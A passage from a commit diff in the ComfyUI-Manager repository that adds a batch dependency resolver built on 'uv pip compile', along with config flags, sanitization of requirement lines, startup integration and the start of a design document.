mirror of
https://github.com/Comfy-Org/ComfyUI-Manager.git
synced 2026-03-28 20:33:40 +08:00
feat(deps): add unified dependency resolver using uv pip compile
- Add UnifiedDepResolver module with 7 FRs: collect, compile, install pipeline - Integrate startup batch resolution in prestartup_script.py (module scope) - Skip per-node pip install in execute_install_script() when unified mode active - Add use_unified_resolver config flag following use_uv pattern - Input sanitization: reject -r, -e, --find-links, @ file://, path separators - Handle --index-url/--extra-index-url separation with credential redaction - Fallback to per-node pip on resolver failure or uv unavailability - Add 98 unit tests across 20 test classes - Add PRD and Design docs with cm_global integration marked as DEFERRED
This commit is contained in:
parent
0d88a3874d
commit
e60a66b1e6
4
.gitignore
vendored
4
.gitignore
vendored
@ -21,4 +21,6 @@ check2.sh
|
||||
build
|
||||
dist
|
||||
*.egg-info
|
||||
.env
|
||||
.env
|
||||
.claude
|
||||
test_venv
|
||||
|
||||
@ -25,6 +25,7 @@ comfyui_manager_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '
|
||||
cache_dir = os.path.join(comfyui_manager_path, '.cache') # This path is also updated together in **manager_core.update_user_directory**.
|
||||
|
||||
use_uv = False
|
||||
use_unified_resolver = False
|
||||
bypass_ssl = False
|
||||
|
||||
def is_manager_pip_package():
|
||||
|
||||
625
comfyui_manager/common/unified_dep_resolver.py
Normal file
625
comfyui_manager/common/unified_dep_resolver.py
Normal file
@ -0,0 +1,625 @@
|
||||
"""Unified Dependency Resolver for ComfyUI Manager.
|
||||
|
||||
Resolves and installs all node-pack dependencies at once using ``uv pip compile``
|
||||
followed by ``uv pip install -r``, replacing per-node-pack ``pip install`` calls.
|
||||
|
||||
Responsibility scope
|
||||
--------------------
|
||||
- Dependency collection, resolution, and installation **only**.
|
||||
- ``install.py`` execution and ``PIPFixer`` calls are the caller's responsibility.
|
||||
|
||||
See Also
|
||||
--------
|
||||
- docs/dev/PRD-unified-dependency-resolver.md
|
||||
- docs/dev/DESIGN-unified-dependency-resolver.md
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import shutil
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
from collections import defaultdict
|
||||
from dataclasses import dataclass, field
|
||||
|
||||
from . import manager_util
|
||||
|
||||
logger = logging.getLogger("ComfyUI-Manager")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Exceptions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class UvNotAvailableError(RuntimeError):
|
||||
"""Raised when neither ``python -m uv`` nor standalone ``uv`` is found."""
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Data classes
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@dataclass
|
||||
class PackageRequirement:
|
||||
"""Individual package dependency."""
|
||||
name: str # Normalised package name
|
||||
spec: str # Original spec string (e.g. ``torch>=2.0``)
|
||||
source: str # Absolute path of the source node pack
|
||||
|
||||
|
||||
@dataclass
|
||||
class CollectedDeps:
|
||||
"""Aggregated dependency collection result."""
|
||||
requirements: list[PackageRequirement] = field(default_factory=list)
|
||||
skipped: list[tuple[str, str]] = field(default_factory=list)
|
||||
sources: dict[str, list[str]] = field(default_factory=dict)
|
||||
extra_index_urls: list[str] = field(default_factory=list)
|
||||
|
||||
|
||||
@dataclass
|
||||
class LockfileResult:
|
||||
"""Result of ``uv pip compile``."""
|
||||
success: bool
|
||||
lockfile_path: str | None = None
|
||||
conflicts: list[str] = field(default_factory=list)
|
||||
stderr: str = ""
|
||||
|
||||
|
||||
@dataclass
|
||||
class InstallResult:
|
||||
"""Result of ``uv pip install -r`` (atomic: all-or-nothing)."""
|
||||
success: bool
|
||||
installed: list[str] = field(default_factory=list)
|
||||
skipped: list[str] = field(default_factory=list)
|
||||
stderr: str = ""
|
||||
|
||||
|
||||
@dataclass
|
||||
class ResolveResult:
|
||||
"""Full pipeline result."""
|
||||
success: bool
|
||||
collected: CollectedDeps | None = None
|
||||
lockfile: LockfileResult | None = None
|
||||
install: InstallResult | None = None
|
||||
error: str | None = None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Resolver
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
_TMP_PREFIX = "comfyui_resolver_"
|
||||
|
||||
# Security: reject dangerous requirement patterns.
|
||||
_DANGEROUS_PATTERNS = re.compile(
|
||||
r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
|
||||
r'|--find-links\b|-f\b|.*@\s*file://)',
|
||||
re.IGNORECASE,
|
||||
)
|
||||
|
||||
# Credential redaction in index URLs.
|
||||
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
|
||||
|
||||
# Version-spec parsing (same regex as existing ``is_blacklisted()``).
|
||||
_VERSION_SPEC_PATTERN = re.compile(r'([^<>!~=]+)([<>!~=]=?)([^ ]*)')
|
||||
|
||||
|
||||
|
||||
def collect_node_pack_paths(custom_nodes_dirs: list[str]) -> list[str]:
|
||||
"""Collect all installed node-pack directory paths.
|
||||
|
||||
Parameters
|
||||
----------
|
||||
custom_nodes_dirs:
|
||||
Base directories returned by ``folder_paths.get_folder_paths('custom_nodes')``.
|
||||
|
||||
Returns
|
||||
-------
|
||||
list[str]
|
||||
Paths of node-pack directories (immediate subdirectories of each base).
|
||||
"""
|
||||
paths: list[str] = []
|
||||
for base in custom_nodes_dirs:
|
||||
if os.path.isdir(base):
|
||||
for name in os.listdir(base):
|
||||
fullpath = os.path.join(base, name)
|
||||
if os.path.isdir(fullpath):
|
||||
paths.append(fullpath)
|
||||
return paths
|
||||
|
||||
|
||||
def collect_base_requirements(comfy_path: str) -> list[str]:
|
||||
"""Read ComfyUI's own base requirements as constraint lines.
|
||||
|
||||
Reads ``requirements.txt`` and ``manager_requirements.txt`` from *comfy_path*.
|
||||
These are ComfyUI-level dependencies only — never read from node packs.
|
||||
|
||||
Parameters
|
||||
----------
|
||||
comfy_path:
|
||||
Root directory of the ComfyUI installation.
|
||||
|
||||
Returns
|
||||
-------
|
||||
list[str]
|
||||
Non-empty, non-comment requirement lines.
|
||||
"""
|
||||
reqs: list[str] = []
|
||||
for filename in ("requirements.txt", "manager_requirements.txt"):
|
||||
req_path = os.path.join(comfy_path, filename)
|
||||
if os.path.exists(req_path):
|
||||
with open(req_path, encoding="utf-8") as f:
|
||||
reqs.extend(
|
||||
line.strip() for line in f
|
||||
if line.strip() and not line.strip().startswith('#')
|
||||
)
|
||||
return reqs
|
||||
|
||||
|
||||
class UnifiedDepResolver:
|
||||
"""Unified dependency resolver.
|
||||
|
||||
Resolves and installs all dependencies of (installed + new) node packs at
|
||||
once using *uv*.
|
||||
|
||||
Parameters
|
||||
----------
|
||||
node_pack_paths:
|
||||
Absolute paths of node-pack directories to consider.
|
||||
base_requirements:
|
||||
Lines from ComfyUI's own ``requirements.txt`` (used as constraints).
|
||||
blacklist:
|
||||
Package names to skip unconditionally (default: ``cm_global.pip_blacklist``).
|
||||
overrides:
|
||||
Package-name remapping dict (default: ``cm_global.pip_overrides``).
|
||||
downgrade_blacklist:
|
||||
Packages whose installed versions must not be downgraded
|
||||
(default: ``cm_global.pip_downgrade_blacklist``).
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
node_pack_paths: list[str],
|
||||
base_requirements: list[str] | None = None,
|
||||
blacklist: set[str] | None = None,
|
||||
overrides: dict[str, str] | None = None,
|
||||
downgrade_blacklist: list[str] | None = None,
|
||||
) -> None:
|
||||
self.node_pack_paths = node_pack_paths
|
||||
self.base_requirements = base_requirements or []
|
||||
self.blacklist: set[str] = blacklist if blacklist is not None else set()
|
||||
self.overrides: dict[str, str] = overrides if overrides is not None else {}
|
||||
self.downgrade_blacklist: list[str] = (
|
||||
downgrade_blacklist if downgrade_blacklist is not None else []
|
||||
)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Public API
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def resolve_and_install(self) -> ResolveResult:
|
||||
"""Execute the full pipeline: cleanup → collect → compile → install."""
|
||||
self.cleanup_stale_tmp()
|
||||
|
||||
tmp_dir: str | None = None
|
||||
try:
|
||||
# 1. Collect
|
||||
collected = self.collect_requirements()
|
||||
if not collected.requirements:
|
||||
logger.info("[UnifiedDepResolver] No dependencies to resolve")
|
||||
return ResolveResult(success=True, collected=collected)
|
||||
|
||||
logger.info(
|
||||
"[UnifiedDepResolver] Collected %d deps from %d sources (skipped %d)",
|
||||
len(collected.requirements),
|
||||
len(collected.sources),
|
||||
len(collected.skipped),
|
||||
)
|
||||
|
||||
# 2. Compile
|
||||
lockfile = self.compile_lockfile(collected)
|
||||
if not lockfile.success:
|
||||
return ResolveResult(
|
||||
success=False,
|
||||
collected=collected,
|
||||
lockfile=lockfile,
|
||||
error=f"compile failed: {'; '.join(lockfile.conflicts)}",
|
||||
)
|
||||
# tmp_dir is the parent of lockfile_path
|
||||
tmp_dir = os.path.dirname(lockfile.lockfile_path) # type: ignore[arg-type]
|
||||
|
||||
# 3. Install
|
||||
install = self.install_from_lockfile(lockfile.lockfile_path) # type: ignore[arg-type]
|
||||
return ResolveResult(
|
||||
success=install.success,
|
||||
collected=collected,
|
||||
lockfile=lockfile,
|
||||
install=install,
|
||||
error=install.stderr if not install.success else None,
|
||||
)
|
||||
except UvNotAvailableError:
|
||||
raise
|
||||
except Exception as exc:
|
||||
logger.warning("[UnifiedDepResolver] unexpected error: %s", exc)
|
||||
return ResolveResult(success=False, error=str(exc))
|
||||
finally:
|
||||
if tmp_dir and os.path.isdir(tmp_dir):
|
||||
shutil.rmtree(tmp_dir, ignore_errors=True)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Step 1: collect
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def collect_requirements(self) -> CollectedDeps:
|
||||
"""Collect dependencies from all node packs."""
|
||||
requirements: list[PackageRequirement] = []
|
||||
skipped: list[tuple[str, str]] = []
|
||||
sources: dict[str, list[str]] = defaultdict(list)
|
||||
extra_index_urls: list[str] = []
|
||||
|
||||
for pack_path in self.node_pack_paths:
|
||||
# Exclude disabled node packs (directory-based mechanism).
|
||||
if self._is_disabled_path(pack_path):
|
||||
continue
|
||||
|
||||
req_file = os.path.join(pack_path, "requirements.txt")
|
||||
if not os.path.exists(req_file):
|
||||
continue
|
||||
|
||||
for raw_line in self._read_requirements(req_file):
|
||||
line = raw_line.split('#')[0].strip()
|
||||
if not line:
|
||||
continue
|
||||
|
||||
# 0. Security: reject dangerous patterns
|
||||
if _DANGEROUS_PATTERNS.match(line):
|
||||
skipped.append((line, f"rejected: dangerous pattern in {pack_path}"))
|
||||
logger.warning(
|
||||
"[UnifiedDepResolver] rejected dangerous line: '%s' from %s",
|
||||
line, pack_path,
|
||||
)
|
||||
continue
|
||||
|
||||
# 1. Separate --index-url / --extra-index-url handling
|
||||
# (before path separator check, because URLs contain '/')
|
||||
if '--index-url' in line or '--extra-index-url' in line:
|
||||
pkg_spec, index_url = self._split_index_url(line)
|
||||
if index_url:
|
||||
extra_index_urls.append(index_url)
|
||||
line = pkg_spec
|
||||
if not line:
|
||||
# Standalone option line (no package prefix)
|
||||
continue
|
||||
|
||||
# Reject path separators in package name portion
|
||||
pkg_name_part = re.split(r'[><=!~;]', line)[0]
|
||||
if '/' in pkg_name_part or '\\' in pkg_name_part:
|
||||
skipped.append((line, "rejected: path separator in package name"))
|
||||
logger.warning(
|
||||
"[UnifiedDepResolver] rejected path separator: '%s' from %s",
|
||||
line, pack_path,
|
||||
)
|
||||
continue
|
||||
|
||||
# 2. Remap package name
|
||||
pkg_spec = self._remap_package(line)
|
||||
|
||||
# 3. Extract normalised name
|
||||
pkg_name = self._extract_package_name(pkg_spec)
|
||||
|
||||
# 4. Blacklist check
|
||||
if pkg_name in self.blacklist:
|
||||
skipped.append((pkg_spec, "blacklisted"))
|
||||
continue
|
||||
|
||||
# 5. Downgrade blacklist check
|
||||
if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
|
||||
skipped.append((pkg_spec, "downgrade blacklisted"))
|
||||
continue
|
||||
|
||||
# 6. Collect (no dedup — uv handles resolution)
|
||||
requirements.append(
|
||||
PackageRequirement(name=pkg_name, spec=pkg_spec, source=pack_path)
|
||||
)
|
||||
sources[pkg_name].append(pack_path)
|
||||
|
||||
return CollectedDeps(
|
||||
requirements=requirements,
|
||||
skipped=skipped,
|
||||
sources=dict(sources),
|
||||
extra_index_urls=list(set(extra_index_urls)),
|
||||
)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Step 2: compile
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
|
||||
"""Generate pinned requirements via ``uv pip compile``."""
|
||||
tmp_dir = tempfile.mkdtemp(prefix=_TMP_PREFIX)
|
||||
|
||||
try:
|
||||
# Write temp requirements
|
||||
tmp_req = os.path.join(tmp_dir, "input-requirements.txt")
|
||||
with open(tmp_req, "w", encoding="utf-8") as fh:
|
||||
for req in deps.requirements:
|
||||
fh.write(req.spec + "\n")
|
||||
|
||||
# Write constraints (base dependencies)
|
||||
tmp_constraints: str | None = None
|
||||
if self.base_requirements:
|
||||
tmp_constraints = os.path.join(tmp_dir, "constraints.txt")
|
||||
with open(tmp_constraints, "w", encoding="utf-8") as fh:
|
||||
for line in self.base_requirements:
|
||||
fh.write(line.strip() + "\n")
|
||||
|
||||
lockfile_path = os.path.join(tmp_dir, "resolved-requirements.txt")
|
||||
|
||||
cmd = self._get_uv_cmd() + [
|
||||
"pip", "compile",
|
||||
tmp_req,
|
||||
"--output-file", lockfile_path,
|
||||
"--python", sys.executable,
|
||||
]
|
||||
if tmp_constraints:
|
||||
cmd += ["--constraint", tmp_constraints]
|
||||
|
||||
for url in deps.extra_index_urls:
|
||||
logger.info(
|
||||
"[UnifiedDepResolver] extra-index-url: %s",
|
||||
self._redact_url(url),
|
||||
)
|
||||
cmd += ["--extra-index-url", url]
|
||||
|
||||
logger.info("[UnifiedDepResolver] running: %s", " ".join(
|
||||
self._redact_url(c) for c in cmd
|
||||
))
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=300,
|
||||
)
|
||||
except subprocess.TimeoutExpired:
|
||||
logger.warning("[UnifiedDepResolver] uv pip compile timed out (300s)")
|
||||
return LockfileResult(
|
||||
success=False,
|
||||
conflicts=["compile timeout exceeded (300s)"],
|
||||
stderr="TimeoutExpired",
|
||||
)
|
||||
|
||||
if result.returncode != 0:
|
||||
conflicts = self._parse_conflicts(result.stderr)
|
||||
return LockfileResult(
|
||||
success=False,
|
||||
conflicts=conflicts,
|
||||
stderr=result.stderr,
|
||||
)
|
||||
|
||||
if not os.path.exists(lockfile_path):
|
||||
return LockfileResult(
|
||||
success=False,
|
||||
conflicts=["lockfile not created despite success return code"],
|
||||
stderr=result.stderr,
|
||||
)
|
||||
|
||||
return LockfileResult(success=True, lockfile_path=lockfile_path)
|
||||
|
||||
except UvNotAvailableError:
|
||||
shutil.rmtree(tmp_dir, ignore_errors=True)
|
||||
raise
|
||||
except Exception:
|
||||
shutil.rmtree(tmp_dir, ignore_errors=True)
|
||||
raise
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Step 3: install
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
|
||||
"""Install from pinned requirements (``uv pip install -r``).
|
||||
|
||||
Do **not** use ``uv pip sync`` — it deletes packages not in the
|
||||
lockfile, risking removal of torch, ComfyUI deps, etc.
|
||||
"""
|
||||
cmd = self._get_uv_cmd() + [
|
||||
"pip", "install",
|
||||
"--requirement", lockfile_path,
|
||||
"--python", sys.executable,
|
||||
]
|
||||
|
||||
logger.info("[UnifiedDepResolver] running: %s", " ".join(cmd))
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=600,
|
||||
)
|
||||
except subprocess.TimeoutExpired:
|
||||
logger.warning("[UnifiedDepResolver] uv pip install timed out (600s)")
|
||||
return InstallResult(
|
||||
success=False,
|
||||
stderr="TimeoutExpired: install exceeded 600s",
|
||||
)
|
||||
|
||||
installed, skipped_pkgs = self._parse_install_output(result)
|
||||
|
||||
return InstallResult(
|
||||
success=result.returncode == 0,
|
||||
installed=installed,
|
||||
skipped=skipped_pkgs,
|
||||
stderr=result.stderr if result.returncode != 0 else "",
|
||||
)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# uv command resolution
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _get_uv_cmd(self) -> list[str]:
|
||||
"""Determine the ``uv`` command to use.
|
||||
|
||||
``python_embeded`` spelling is intentional — matches the actual path
|
||||
name in the ComfyUI Windows distribution.
|
||||
"""
|
||||
embedded = 'python_embeded' in sys.executable
|
||||
|
||||
# 1. Try uv as a Python module
|
||||
try:
|
||||
test_cmd = (
|
||||
[sys.executable]
|
||||
+ (['-s'] if embedded else [])
|
||||
+ ['-m', 'uv', '--version']
|
||||
)
|
||||
subprocess.check_output(test_cmd, stderr=subprocess.DEVNULL, timeout=5)
|
||||
return [sys.executable] + (['-s'] if embedded else []) + ['-m', 'uv']
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2. Standalone uv executable
|
||||
if shutil.which('uv'):
|
||||
return ['uv']
|
||||
|
||||
raise UvNotAvailableError("uv is not available")
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Helpers — collection
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
@staticmethod
|
||||
def _is_disabled_path(path: str) -> bool:
|
||||
"""Return ``True`` if *path* is within a ``.disabled`` directory."""
|
||||
# New style: custom_nodes/.disabled/{name}
|
||||
if '/.disabled/' in path or os.path.basename(os.path.dirname(path)) == '.disabled':
|
||||
return True
|
||||
# Old style: {name}.disabled suffix
|
||||
if path.rstrip('/').endswith('.disabled'):
|
||||
return True
|
||||
return False
|
||||
|
||||
@staticmethod
|
||||
def _read_requirements(filepath: str) -> list[str]:
|
||||
"""Read requirements file using ``robust_readlines`` pattern."""
|
||||
return manager_util.robust_readlines(filepath)
|
||||
|
||||
@staticmethod
|
||||
def _split_index_url(line: str) -> tuple[str, str | None]:
|
||||
"""Split ``'package --index-url URL'`` → ``(package, URL)``.
|
||||
|
||||
Also handles standalone ``--index-url URL`` and
|
||||
``--extra-index-url URL`` lines (with no package prefix).
|
||||
"""
|
||||
# Handle --extra-index-url first (contains '--index-url' as substring)
|
||||
for option in ('--extra-index-url', '--index-url'):
|
||||
if option in line:
|
||||
parts = line.split(option, 1)
|
||||
pkg_spec = parts[0].strip()
|
||||
url = parts[1].strip() if len(parts) == 2 else None
|
||||
return pkg_spec, url
|
||||
return line, None
|
||||
|
||||
def _remap_package(self, pkg: str) -> str:
|
||||
"""Apply ``pip_overrides`` remapping."""
|
||||
if pkg in self.overrides:
|
||||
remapped = self.overrides[pkg]
|
||||
logger.info("[UnifiedDepResolver] '%s' remapped to '%s'", pkg, remapped)
|
||||
return remapped
|
||||
return pkg
|
||||
|
||||
@staticmethod
|
||||
def _extract_package_name(spec: str) -> str:
|
||||
"""Extract normalised package name from a requirement spec."""
|
||||
name = re.split(r'[><=!~;\[@ ]', spec)[0].strip()
|
||||
return name.lower().replace('-', '_')
|
||||
|
||||
def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
|
||||
"""Reproduce the downgrade logic from ``is_blacklisted()``.
|
||||
|
||||
Uses ``manager_util.StrictVersion`` — **not** ``packaging.version``.
|
||||
"""
|
||||
if pkg_name not in self.downgrade_blacklist:
|
||||
return False
|
||||
|
||||
installed = manager_util.get_installed_packages()
|
||||
match = _VERSION_SPEC_PATTERN.search(pkg_spec)
|
||||
|
||||
if match is None:
|
||||
# No version spec: prevent reinstall if already installed
|
||||
if pkg_name in installed:
|
||||
return True
|
||||
elif match.group(2) in ('<=', '==', '<', '~='):
|
||||
if pkg_name in installed:
|
||||
try:
|
||||
installed_ver = manager_util.StrictVersion(installed[pkg_name])
|
||||
requested_ver = manager_util.StrictVersion(match.group(3))
|
||||
if installed_ver >= requested_ver:
|
||||
return True
|
||||
except (ValueError, TypeError):
|
||||
logger.warning(
|
||||
"[UnifiedDepResolver] version parse failed: %s", pkg_spec,
|
||||
)
|
||||
return False
|
||||
|
||||
return False
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Helpers — parsing & output
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
@staticmethod
|
||||
def _parse_conflicts(stderr: str) -> list[str]:
|
||||
"""Extract conflict descriptions from ``uv pip compile`` stderr."""
|
||||
conflicts: list[str] = []
|
||||
for line in stderr.splitlines():
|
||||
line = line.strip()
|
||||
if line and ('conflict' in line.lower() or 'error' in line.lower()):
|
||||
conflicts.append(line)
|
||||
return conflicts or [stderr.strip()] if stderr.strip() else []
|
||||
|
||||
@staticmethod
|
||||
def _parse_install_output(
|
||||
result: subprocess.CompletedProcess[str],
|
||||
) -> tuple[list[str], list[str]]:
|
||||
"""Parse ``uv pip install`` stdout for installed/skipped packages."""
|
||||
installed: list[str] = []
|
||||
skipped_pkgs: list[str] = []
|
||||
for line in result.stdout.splitlines():
|
||||
line_lower = line.strip().lower()
|
||||
if 'installed' in line_lower or 'updated' in line_lower:
|
||||
installed.append(line.strip())
|
||||
elif 'already' in line_lower or 'satisfied' in line_lower:
|
||||
skipped_pkgs.append(line.strip())
|
||||
return installed, skipped_pkgs
|
||||
|
||||
@staticmethod
|
||||
def _redact_url(url: str) -> str:
|
||||
"""Mask ``user:pass@`` credentials in URLs."""
|
||||
return _CREDENTIAL_PATTERN.sub('://****@', url)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Temp-file housekeeping
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
@classmethod
|
||||
def cleanup_stale_tmp(cls, max_age_seconds: int = 3600) -> None:
|
||||
"""Remove stale temp directories from previous abnormal terminations."""
|
||||
tmp_root = tempfile.gettempdir()
|
||||
now = time.time()
|
||||
for entry in os.scandir(tmp_root):
|
||||
if entry.is_dir() and entry.name.startswith(_TMP_PREFIX):
|
||||
try:
|
||||
age = now - entry.stat().st_mtime
|
||||
if age > max_age_seconds:
|
||||
shutil.rmtree(entry.path, ignore_errors=True)
|
||||
logger.info(
|
||||
"[UnifiedDepResolver] cleaned stale tmp: %s", entry.path,
|
||||
)
|
||||
except OSError:
|
||||
pass
|
||||
@ -843,7 +843,10 @@ class UnifiedManager:
|
||||
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
|
||||
return try_install_script(url, repo_path, install_cmd)
|
||||
else:
|
||||
if os.path.exists(requirements_path) and not no_deps:
|
||||
if not no_deps and manager_util.use_unified_resolver:
|
||||
# Unified mode: skip per-node pip install (deps resolved at startup batch)
|
||||
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
|
||||
elif os.path.exists(requirements_path) and not no_deps:
|
||||
print("Install: pip packages")
|
||||
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
|
||||
lines = manager_util.robust_readlines(requirements_path)
|
||||
@ -1604,6 +1607,7 @@ def write_config():
|
||||
config['default'] = {
|
||||
'git_exe': get_config()['git_exe'],
|
||||
'use_uv': get_config()['use_uv'],
|
||||
'use_unified_resolver': get_config()['use_unified_resolver'],
|
||||
'channel_url': get_config()['channel_url'],
|
||||
'share_option': get_config()['share_option'],
|
||||
'bypass_ssl': get_config()['bypass_ssl'],
|
||||
@ -1642,12 +1646,14 @@ def read_config():
|
||||
return default_conf[key].lower() == 'true' if key in default_conf else False
|
||||
|
||||
manager_util.use_uv = default_conf['use_uv'].lower() == 'true' if 'use_uv' in default_conf else False
|
||||
manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true' if 'use_unified_resolver' in default_conf else False
|
||||
manager_util.bypass_ssl = get_bool('bypass_ssl', False)
|
||||
|
||||
return {
|
||||
'http_channel_enabled': get_bool('http_channel_enabled', False),
|
||||
'git_exe': default_conf.get('git_exe', ''),
|
||||
'use_uv': get_bool('use_uv', True),
|
||||
'use_unified_resolver': get_bool('use_unified_resolver', False),
|
||||
'channel_url': default_conf.get('channel_url', DEFAULT_CHANNEL),
|
||||
'default_cache_as_channel_url': get_bool('default_cache_as_channel_url', False),
|
||||
'share_option': default_conf.get('share_option', 'all').lower(),
|
||||
@ -1668,12 +1674,14 @@ def read_config():
|
||||
import importlib.util
|
||||
# temporary disable `uv` on Windows by default (https://github.com/Comfy-Org/ComfyUI-Manager/issues/1969)
|
||||
manager_util.use_uv = importlib.util.find_spec("uv") is not None and platform.system() != "Windows"
|
||||
manager_util.use_unified_resolver = False
|
||||
manager_util.bypass_ssl = False
|
||||
|
||||
return {
|
||||
'http_channel_enabled': False,
|
||||
'git_exe': '',
|
||||
'use_uv': manager_util.use_uv,
|
||||
'use_unified_resolver': False,
|
||||
'channel_url': DEFAULT_CHANNEL,
|
||||
'default_cache_as_channel_url': False,
|
||||
'share_option': 'all',
|
||||
@ -1871,7 +1879,6 @@ def __win_check_git_pull(path):
|
||||
|
||||
|
||||
def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=False, no_deps=False):
|
||||
# import ipdb; ipdb.set_trace()
|
||||
install_script_path = os.path.join(repo_path, "install.py")
|
||||
requirements_path = os.path.join(repo_path, "requirements.txt")
|
||||
|
||||
@ -1879,7 +1886,10 @@ def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=Fa
|
||||
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
|
||||
try_install_script(url, repo_path, install_cmd)
|
||||
else:
|
||||
if os.path.exists(requirements_path) and not no_deps:
|
||||
if not no_deps and manager_util.use_unified_resolver:
|
||||
# Unified mode: skip per-node pip install (deps resolved at startup batch)
|
||||
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
|
||||
elif os.path.exists(requirements_path) and not no_deps:
|
||||
print("Install: pip packages")
|
||||
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
|
||||
with open(requirements_path, "r") as requirements_file:
|
||||
|
||||
@ -88,6 +88,11 @@ def read_uv_mode():
|
||||
if 'use_uv' in default_conf:
|
||||
manager_util.use_uv = default_conf['use_uv'].lower() == 'true'
|
||||
|
||||
|
||||
def read_unified_resolver_mode():
|
||||
if 'use_unified_resolver' in default_conf:
|
||||
manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true'
|
||||
|
||||
def check_file_logging():
|
||||
global enable_file_logging
|
||||
if 'file_logging' in default_conf and default_conf['file_logging'].lower() == 'false':
|
||||
@ -96,9 +101,14 @@ def check_file_logging():
|
||||
|
||||
read_config()
|
||||
read_uv_mode()
|
||||
read_unified_resolver_mode()
|
||||
security_check.security_check()
|
||||
check_file_logging()
|
||||
|
||||
# Module-level flag set by startup batch resolver when it succeeds.
|
||||
# Used by execute_lazy_install_script() to skip per-node pip installs.
|
||||
_unified_resolver_succeeded = False
|
||||
|
||||
cm_global.pip_overrides = {}
|
||||
|
||||
if os.path.exists(manager_pip_overrides_path):
|
||||
@ -581,7 +591,8 @@ def execute_lazy_install_script(repo_path, executable):
|
||||
install_script_path = os.path.join(repo_path, "install.py")
|
||||
requirements_path = os.path.join(repo_path, "requirements.txt")
|
||||
|
||||
if os.path.exists(requirements_path):
|
||||
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
|
||||
# Per-node pip install: only runs if unified resolver is disabled or failed
|
||||
print(f"Install: pip packages for '{repo_path}'")
|
||||
|
||||
lines = manager_util.robust_readlines(requirements_path)
|
||||
@ -751,6 +762,35 @@ def execute_startup_script():
|
||||
print("#######################################################################\n")
|
||||
|
||||
|
||||
# --- Unified dependency resolver: batch resolution at startup ---
|
||||
# Runs unconditionally when enabled, independent of install-scripts.txt existence.
|
||||
if manager_util.use_unified_resolver:
|
||||
try:
|
||||
from .common.unified_dep_resolver import (
|
||||
UnifiedDepResolver,
|
||||
UvNotAvailableError,
|
||||
collect_base_requirements,
|
||||
collect_node_pack_paths,
|
||||
)
|
||||
|
||||
_resolver = UnifiedDepResolver(
|
||||
node_pack_paths=collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes')),
|
||||
base_requirements=collect_base_requirements(comfy_path),
|
||||
blacklist=set(),
|
||||
overrides={},
|
||||
downgrade_blacklist=[],
|
||||
)
|
||||
_result = _resolver.resolve_and_install()
|
||||
if _result.success:
|
||||
_unified_resolver_succeeded = True
|
||||
logging.info("[UnifiedDepResolver] startup batch resolution succeeded")
|
||||
else:
|
||||
logging.warning("[UnifiedDepResolver] startup batch failed: %s, falling back to per-node pip", _result.error)
|
||||
except UvNotAvailableError:
|
||||
logging.warning("[UnifiedDepResolver] uv not available at startup, falling back to per-node pip")
|
||||
except Exception as e:
|
||||
logging.warning("[UnifiedDepResolver] startup error: %s, falling back to per-node pip", e)
|
||||
|
||||
# Check if script_list_path exists
|
||||
if os.path.exists(script_list_path):
|
||||
execute_startup_script()
|
||||
|
||||
727
docs/dev/DESIGN-unified-dependency-resolver.md
Normal file
727
docs/dev/DESIGN-unified-dependency-resolver.md
Normal file
@ -0,0 +1,727 @@
|
||||
# Architecture Design: Unified Dependency Resolver
|
||||
|
||||
## 1. System Architecture
|
||||
|
||||
### 1.1 Module Location
|
||||
|
||||
```
|
||||
comfyui_manager/
|
||||
├── glob/
|
||||
│ └── manager_core.py # Existing: execute_install_script() call sites (2 locations)
|
||||
├── common/
|
||||
